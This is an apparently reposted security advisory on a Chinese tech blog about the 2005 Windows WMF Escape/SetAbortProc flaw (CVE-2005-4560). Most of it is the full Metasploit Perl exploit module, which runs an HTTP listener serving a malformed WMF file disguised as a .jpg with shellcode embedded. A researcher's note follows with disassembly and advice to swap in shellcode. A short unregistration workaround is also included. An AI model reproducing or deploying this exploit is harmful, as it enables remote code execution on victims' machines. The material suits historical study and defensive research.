2. 技术人生
    3. Microsoft Windows Shimgvw.dll WMF (Exploit)

    Microsoft Windows Shimgvw.dll WMF (Exploit)

    技术2022-05-11  65
    Microsoft Windows Shimgvw.dll WMF (Exploit) ------------------------------------------------------------------------ SUMMARY A vulnerability in the way Microsoft's Windows parsers WMF files that allows attackers to insert arbitrary code to the file and cause its execution by crafting a malformed WMF file. DETAILS Workaround: To Un-register the Windows Picture and Fax Viewer (Shimgvw.dll) that is vulnerable do the following: 1. Click Start, click Run, type regsvr32 -u %windir%/system32/shimgvw.dll and then click OK. 2. A dialog box appears to confirm that the un-registration process has succeeded. Click OK to close the dialog box. Exploit: ## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Exploit::ie_xp_pfv_metafile; use strict; use base "Msf::Exploit"; use Pex::Text; use IO::Socket::INET; my $advanced =   {   }; my $info =   { 'Name' => 'Windows XP/2003 Metafile Escape() SetAbortProc Code Execution', 'Version' => '$Revision: 1.6 $', 'Authors' =>    [   'H D Moore <hdm [at] metasploit.com',   'san <san [at] xfocus.org>',   'O600KO78RUS[at]unknown.ru'    ], 'Description' =>    Pex::Text::Freeform(qq{    This module exploits a vulnerability in the GDI library included with    Windows XP and 2003. This vulnerability uses the 'Escape' metafile function    to execute arbitrary code through the SetAbortProc procedure. This module    generates a random WMF record stream for each request. }), 'Arch' => [ 'x86' ], 'OS' => [ 'win32', 'winxp', 'win2003' ], 'Priv' => 0, 'UserOpts' =>    {   'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080 ],   'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],    }, 'Payload' =>    {   'Space' => 1000+int(rand(1024)), # :-)    }, 'Refs' =>    [     ['BID', '16074'],   ['CVE', '2005-4560'],     ['OSVDB', '21987'],   ['MIL', '111'],   ['URL', ' http://wvware.sourceforge.net/caolan/ora-wmf.html'],   ['URL', ' http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],    ], 'DefaultTarget' => 0, 'Targets' =>    [   [ 'Automatic - Windows XP / Windows 2003' ]    ], 'Keys' => [ 'wmf' ], 'DisclosureDate' => 'Dec 27 2005',   }; sub new { my $class = shift; my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); return($self); } sub Exploit { my $self = shift; my $server = IO::Socket::INET->new(   LocalHost => $self->GetVar('HTTPHOST'),   LocalPort => $self->GetVar('HTTPPORT'),   ReuseAddr => 1,   Listen => 1,   Proto => 'tcp' ); my $client; # Did the listener create fail? if (not defined($server)) {   $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));   return; } my $httphost = $self->GetVar('HTTPHOST'); if ($httphost eq '0.0.0.0') {   $httphost = Pex::Utils::SourceIP('1.2.3.4'); } $self->PrintLine("[*] Waiting for connections to http://";. $httphost ":". $self->GetVar('HTTPPORT') ."/"); while (defined($client = $server->accept())) {   $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client)); } return; } sub HandleHttpClient { my $self = shift; my $fd = shift; my $shellcode = $self->GetVar('EncodedPayload')->Payload; # Push our minimum length just over the ethernet MTU my $pre_mlen = 1440 + rand(8192); my $suf_mlen = rand(8192)+128; # The number of random objects we generated my $fill = 0; # The buffer of random bogus objects my $pre_buff = ""; my $suf_buff = ""; while (length($pre_buff) < $pre_mlen && $fill < 65535) {   $pre_buff .= RandomWMFRecord();   $fill += 1; } while (length($suf_buff) < $suf_mlen && $fill < 65535) {   $suf_buff .= RandomWMFRecord();   $fill += 1; } my $clen = 18 + 8 + 6 + length($shellcode) + length($pre_buff) + length($suf_buff); my $content =   #   # WindowsMetaHeader   #   pack('vvvVvVv',     # WORD FileType; /* Type of metafile (0=memory, 1=disk) */     1,     # WORD HeaderSize; /* Size of header in WORDS (always 9) */     9,     # WORD Version; /* Version of Microsoft Windows used */     0x0300,     # DWORD FileSize; /* Total size of the metafile in WORDs */     $clen/2,     # WORD NumOfObjects; /* Number of objects in the file */     $fill+1,     # DWORD MaxRecordSize; /* The size of largest record in WORDs */     int(rand(64)+8),     # WORD NumOfParams; /* Not Used (always 0) */     0   ).   #   # Filler data   #   $pre_buff.   #   # StandardMetaRecord - Escape()   #   pack('Vvv',    # DWORD Size; /* Total size of the record in WORDs */    4,    # WORD Function; /* Function number (defined in WINDOWS.H) */    0xff26, # Can also be 0x0026, 0x0626, etc...    # WORD Parameters[]; /* Parameter values passed to function */    9,   ). $shellcode .   #   # Filler data   #   $suf_buff.   #   # Complete the structure   #   pack('Vv',    3,    0   ); # Set the remote host information my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);   # Read the HTTP command my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);   $self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending payload..."); # Transmit the HTTP response $fd->Send(   "HTTP/1.0 200 OK/r/n" .   "Content-Disposition: inline; filename=". Pex::Text::AlphaNumText(int(rand(1024)+1)) .".jpg/r/n".   "Content-Type: binary/octet-stream/r/n" .   "Content-Length: " . length($content) . "/r/n" .   "Connection: close/r/n" .   "/r/n" .   $content    ); $fd->Close(); } sub RandomWMFRecord { my $type = int(rand(3)); if ($type == 0) {   # CreatePenIndirect   return pack('Vv',    8,    0x02FA   ). Pex::Text::RandomData(10) } elsif ( $type == 1 ) {   # CreateBrushIndirect   return pack('Vv',    7,    0x02FC   ). Pex::Text::RandomData(8) } else {   # Rectangle   return pack('Vv',    7,    0x041B   ). Pex::Text::RandomData(8) } } 1; __END__ Used with permission by san[at]xfocus.org: ------------------------------------------ The recent wmf vul is really fun, I found some interest things after analysed it. I attached a very simple wmf file(64 bytes) which can crash your explorer. You can simply change those 0xcc to your shellcode. An attach wmf file constructs with a 18 bytes metafile header which defined as following: typedef struct _WindowsMetaHeader {   WORD FileType; /* Type of metafile (0=memory, 1=disk) */   WORD HeaderSize; /* Size of header in WORDS (always 9) */   WORD Version; /* Version of Microsoft Windows used */   DWORD FileSize; /* Total size of the metafile in WORDs */   WORD NumOfObjects; /* Number of objects in the file */   DWORD MaxRecordSize; /* The size of largest record in WORDs */   WORD NumOfParams; /* Not Used (always 0) */ } WMFHEAD; and two data records which defined as following: typedef struct _StandardMetaRecord {     DWORD Size; /* Total size of the record in WORDs */     WORD Function; /* Function number (defined in WINDOWS.H) */     WORD Parameters[]; /* Parameter values passed to function */ } WMFRECORD; Somethings that we need to attention: 1. FileSize of _WindowsMetaHeader is in WORDs, don't forget to divide 2; 2. the attack file is larger than 64 bytes; 3. the last record always has a function number of 0000h, a Size of 00000003h, and no Parameters array; 4. the attack record has a function number of 0626h, which defined in wingdi.h. 26h is important, it will flow to Escape function. I found it will lead to SetAbortProc only the Parameters[0] is 0009h. text:77C4B65C loc_77C4B65C: ; CODE XREF: PlayMetaFileRecord+43#j text:77C4B65C ; DATA XREF: .text:off_77C769FE#o text:77C4B65C push [ebp+uFlags] ; case 0x26 text:77C4B65F push ebx text:77C4B660 call sub_77C4B68A text:77C4B665 cmp eax, edi text:77C4B667 mov [ebp+var_4], eax text:77C4B66A jnz loc_77C4B424 text:77C4B670 mov ax, [ebx+6] text:77C4B674 cmp ax, 0Fh text:77C4B678 jnz loc_77C5FC0A ; flow to Escape .. text:77C61062 loc_77C61062: ; CODE XREF: Escape+ECB7#j text:77C61062 sub edi, 6 text:77C61065 jz short loc_77C61090 ; it flow to SetAbortProc only the Parameters[0] is 0009h .. text:77C543E7 loc_77C543E7: ; CODE XREF: SetAbortProc+54#j text:77C543E7 ; SetAbortProc+10720#j text:77C543E7 xor eax, eax text:77C543E9 mov [esi+14h], edi ; write callback pointer? .. text:77C604C8 owned: ; CODE XREF: sub_77C4B09C+1E4#j text:77C604C8 mov eax, [eax+14h] ; the pointer text:77C604CB cmp eax, ecx text:77C604CD jz loc_77C4B286 text:77C604D3 push ecx text:77C604D4 push edi text:77C604D5 call eax ; got it Best Regards -- san <san[at]xfocus.org> ADDITIONAL INFORMATION The information has been provided by  < mailto:hdm@xxxxxxxxxxxxxx> H D Moore. The original article can be found at:  < http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile> http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile The advisory can be found at:  < http://www.securiteam.com/windowsntfocus/6B0022KEKM.html> http://www.securiteam.com/windowsntfocus/6B0022KEKM.html, < http://www.securiteam.com/windowsntfocus/6A0012KEKI.html> http://www.securiteam.com/windowsntfocus/6A0012KEKI.html For more information:  < http://blogs.securiteam.com/index.php/archives/163> http://blogs.securiteam.com/index.php/archives/163

    专利

    最新回复(0)